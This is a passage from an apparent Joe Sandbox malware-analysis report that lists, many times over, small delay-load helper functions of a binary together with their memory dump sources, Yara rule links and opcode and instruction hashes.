                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0012E1E3
                                                                                                                                                                                                      • Part of subcall function 0012E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0012E8D0
                                                                                                                                                                                                      • Part of subcall function 0012E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0012E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: 0a11f7267c20da08c7f1ce7c174a5998af5a7bdb10ca900a253894314df3ccd3
                                                                                                                                                                                                    • Instruction ID: 83c8098eb968faa9df2fa98a309cc9d12c2827cd5d03706bc8c5a37cf4f6dc62
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0a11f7267c20da08c7f1ce7c174a5998af5a7bdb10ca900a253894314df3ccd3
                                                                                                                                                                                                    • Instruction Fuzzy Hash: ACA011E22AA022BC300822023C02C3B02ACC0C2B22332883EF802C8080AA80282008B0
                                                                                                                                                                                                    Function 0012E2AF Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0012E1E3
                                                                                                                                                                                                      • Part of subcall function 0012E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0012E8D0
                                                                                                                                                                                                      • Part of subcall function 0012E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0012E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: e57f860fe76622ea61ce02d6eb4cc7b88ddfa9edab1db3f0a5e77920c8eb0c7e
                                                                                                                                                                                                    • Instruction ID: 83c8098eb968faa9df2fa98a309cc9d12c2827cd5d03706bc8c5a37cf4f6dc62
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e57f860fe76622ea61ce02d6eb4cc7b88ddfa9edab1db3f0a5e77920c8eb0c7e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: ACA011E22AA022BC300822023C02C3B02ACC0C2B22332883EF802C8080AA80282008B0
                                                                                                                                                                                                    Function 0012E2D7 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0012E1E3
                                                                                                                                                                                                      • Part of subcall function 0012E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0012E8D0
                                                                                                                                                                                                      • Part of subcall function 0012E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0012E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: 2647295d97c7f957aa70a786efd7d57ee5eaca931935eb5303451f462c867eb0
                                                                                                                                                                                                    • Instruction ID: 83c8098eb968faa9df2fa98a309cc9d12c2827cd5d03706bc8c5a37cf4f6dc62
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2647295d97c7f957aa70a786efd7d57ee5eaca931935eb5303451f462c867eb0
                                                                                                                                                                                                    • Instruction Fuzzy Hash: ACA011E22AA022BC300822023C02C3B02ACC0C2B22332883EF802C8080AA80282008B0
                                                                                                                                                                                                    Function 0012E2C3 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0012E1E3
                                                                                                                                                                                                      • Part of subcall function 0012E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0012E8D0
                                                                                                                                                                                                      • Part of subcall function 0012E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0012E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: ca33a2e633d51d23912255c663873595ae8876acbd7c7fc3323f789b1737298e
                                                                                                                                                                                                    • Instruction ID: 83c8098eb968faa9df2fa98a309cc9d12c2827cd5d03706bc8c5a37cf4f6dc62
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ca33a2e633d51d23912255c663873595ae8876acbd7c7fc3323f789b1737298e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: ACA011E22AA022BC300822023C02C3B02ACC0C2B22332883EF802C8080AA80282008B0
                                                                                                                                                                                                    Function 0012E2CD Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0012E1E3
                                                                                                                                                                                                      • Part of subcall function 0012E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0012E8D0
                                                                                                                                                                                                      • Part of subcall function 0012E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0012E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: bf0baf884d05772d5c435b9a57737dfd6fb726e56e81dd243624ae6bbd159322
                                                                                                                                                                                                    • Instruction ID: 83c8098eb968faa9df2fa98a309cc9d12c2827cd5d03706bc8c5a37cf4f6dc62
                                                                                                                                                                                                    • Opcode Fuzzy Hash: bf0baf884d05772d5c435b9a57737dfd6fb726e56e81dd243624ae6bbd159322
                                                                                                                                                                                                    • Instruction Fuzzy Hash: ACA011E22AA022BC300822023C02C3B02ACC0C2B22332883EF802C8080AA80282008B0
                                                                                                                                                                                                    Function 0012E3EF Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0012E3FC
                                                                                                                                                                                                      • Part of subcall function 0012E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0012E8D0
                                                                                                                                                                                                      • Part of subcall function 0012E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0012E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: 2771e9991bfe2aa1816f027be68f31bd43e6bafc190ac51bdcf4dac3c7f7d0af
                                                                                                                                                                                                    • Instruction ID: e1f8b9806d3c447bfd21ed23e11e4f720513a4c7772874eb8c4c5eb222e4b1ad
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2771e9991bfe2aa1816f027be68f31bd43e6bafc190ac51bdcf4dac3c7f7d0af
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 26A011E22AA0223E3008A2023C02C3B02ACE0C2B22332802EF8A0A0080AE80082008B2
                                                                                                                                                                                                    Function 0012E414 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0012E3FC
                                                                                                                                                                                                      • Part of subcall function 0012E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0012E8D0
                                                                                                                                                                                                      • Part of subcall function 0012E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0012E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: 0e09625de39b90a8c2952588b8a5db06a15c2209bd01d9d3d1d8ae9e6329c94e
                                                                                                                                                                                                    • Instruction ID: 3acc528753d834b0417c2c4160169263278720e598d1a6507aaeecd243c51f9a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0e09625de39b90a8c2952588b8a5db06a15c2209bd01d9d3d1d8ae9e6329c94e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B1A011E22AA022BC3008A2023C02C3B02ACE0C2B22332882EF88280080AA80082008B2
                                                                                                                                                                                                    Function 0012E40A Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0012E3FC
                                                                                                                                                                                                      • Part of subcall function 0012E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0012E8D0
                                                                                                                                                                                                      • Part of subcall function 0012E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0012E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: 039983cfb7a4f0ac9ed72f422a1360859cf0ee25bc9b91c1ff2810a27c80ac87
                                                                                                                                                                                                    • Instruction ID: 3acc528753d834b0417c2c4160169263278720e598d1a6507aaeecd243c51f9a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 039983cfb7a4f0ac9ed72f422a1360859cf0ee25bc9b91c1ff2810a27c80ac87
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B1A011E22AA022BC3008A2023C02C3B02ACE0C2B22332882EF88280080AA80082008B2
                                                                                                                                                                                                    Function 0012E432 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0012E3FC
                                                                                                                                                                                                      • Part of subcall function 0012E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0012E8D0
                                                                                                                                                                                                      • Part of subcall function 0012E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0012E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: 0ee3c30f06b49804e810b4cf7a8e0d938491d73ca1e98b90649088a98b38076e
                                                                                                                                                                                                    • Instruction ID: 3acc528753d834b0417c2c4160169263278720e598d1a6507aaeecd243c51f9a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0ee3c30f06b49804e810b4cf7a8e0d938491d73ca1e98b90649088a98b38076e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B1A011E22AA022BC3008A2023C02C3B02ACE0C2B22332882EF88280080AA80082008B2
                                                                                                                                                                                                    Function 0012E43C Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0012E3FC
                                                                                                                                                                                                      • Part of subcall function 0012E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0012E8D0
                                                                                                                                                                                                      • Part of subcall function 0012E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0012E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: caa805e242483eb5c9428c64049e65e77c2ea32e41bbe444a4af13ea55f05a9b
                                                                                                                                                                                                    • Instruction ID: 3acc528753d834b0417c2c4160169263278720e598d1a6507aaeecd243c51f9a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: caa805e242483eb5c9428c64049e65e77c2ea32e41bbe444a4af13ea55f05a9b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B1A011E22AA022BC3008A2023C02C3B02ACE0C2B22332882EF88280080AA80082008B2
                                                                                                                                                                                                    Function 0012E446 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0012E3FC
                                                                                                                                                                                                      • Part of subcall function 0012E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0012E8D0
                                                                                                                                                                                                      • Part of subcall function 0012E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0012E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: a75e590dc5c57a4717ccac3087110a2b246f4726768a213828b30e334f84dc07
                                                                                                                                                                                                    • Instruction ID: 3acc528753d834b0417c2c4160169263278720e598d1a6507aaeecd243c51f9a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a75e590dc5c57a4717ccac3087110a2b246f4726768a213828b30e334f84dc07
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B1A011E22AA022BC3008A2023C02C3B02ACE0C2B22332882EF88280080AA80082008B2
                                                                                                                                                                                                    Function 0012E555 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0012E51F
                                                                                                                                                                                                      • Part of subcall function 0012E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0012E8D0
                                                                                                                                                                                                      • Part of subcall function 0012E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0012E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: fcb8529441962c8dfa541a632c571cbe96bb99e71fbb9ddc073537017c6a6ef7
                                                                                                                                                                                                    • Instruction ID: 6a30b7bbcfed23ecb505be31eec273525af1172093ca097f7776d968cbbc6d4d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: fcb8529441962c8dfa541a632c571cbe96bb99e71fbb9ddc073537017c6a6ef7
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 42A011CA2AA022BC300822003C02C3B028CC0C2F20332882EF80A88080BA800C2008B0
                                                                                                                                                                                                    Function 0012E55F Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0012E51F
                                                                                                                                                                                                      • Part of subcall function 0012E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0012E8D0
                                                                                                                                                                                                      • Part of subcall function 0012E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0012E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
